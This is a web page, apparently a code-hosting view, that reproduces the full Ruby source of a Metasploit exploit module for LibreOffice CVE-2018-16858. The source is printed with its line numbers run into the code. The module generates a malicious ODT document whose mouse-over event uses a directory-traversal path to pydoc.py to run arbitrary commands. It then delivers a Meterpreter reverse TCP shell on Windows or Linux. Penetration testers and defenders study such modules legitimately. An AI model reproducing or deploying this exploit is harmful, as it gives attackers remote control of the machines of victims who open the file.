Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::Powershell10include Msf::Exploit::CmdStager1112def initialize(info = {})13super(update_info(info,14'Name' => 'LibreOffice Macro Code Execution',15'Description' => %q{16LibreOffice comes bundled with sample macros written in Python and17allows the ability to bind program events to them. A macro can be tied18to a program event by including the script that contains the macro and19the function name to be executed. Additionally, a directory traversal20vulnerability exists in the component that references the Python script21to be executed. This allows a program event to execute functions from Python22scripts relative to the path of the samples macros folder. The pydoc.py script23included with LibreOffice contains the tempfilepager function that passes24arguments to os.system, allowing RCE.2526This module generates an ODT file with a mouse over event that27when triggered, will execute arbitrary code.28},29'License' => MSF_LICENSE,30'Author' =>31[32'Alex Inführ', # Vulnerability discovery and PoC33'Shelby Pace' # Metasploit Module34],35'References' =>36[37[ 'CVE', '2018-16858' ],38[ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]39],40'Platform' => [ 'win', 'linux' ],41'Arch' => [ ARCH_X86, ARCH_X64 ],42'Targets' =>43[44[45'Windows',46{47'Platform' => 'win',48'Arch' => [ ARCH_X86, ARCH_X64 ],49'Payload' => 'windows/meterpreter/reverse_tcp',50'DefaultOptions' => { 'PrependMigrate' => true }51}52],53[54'Linux',55{56'Platform' => 'linux',57'Arch' => [ ARCH_X86, ARCH_X64 ],58'Payload' => 'linux/x86/meterpreter/reverse_tcp',59'DefaultOptions' => { 'PrependFork' => true },60'CmdStagerFlavor' => 'printf',61}62]63],64'DisclosureDate' => "2018-10-18",65'DefaultTarget' => 066))6768register_options(69[70OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])71])72end7374def gen_windows_cmd75opts =76{77:remove_comspec => true,78:method => 'reflection',79:encode_final_payload => true80}81@cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)82@cmd << ' && echo'83end8485def gen_linux_cmd86@cmd = generate_cmdstager.first87@cmd << ' && echo'88end8990def gen_file(path)91text_content = Rex::Text.rand_text_alpha(10..15)9293# file from Alex Inführ's PoC post referenced above94fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))95libre_file = ERB.new(fodt_file).result(binding())96libre_file97rescue Errno::ENOENT98fail_with(Failure::NotFound, 'Cannot find template file')99end100101def exploit102path = '../../../program/python-core-3.5.5/lib/pydoc.py'103if datastore['TARGET'] == 0104gen_windows_cmd105elsif datastore['TARGET'] == 1106gen_linux_cmd107else108fail_with(Failure::BadConfig, 'A formal target was not chosen.')109end110fodt_file = gen_file(path)111112file_create(fodt_file)113end114end115116117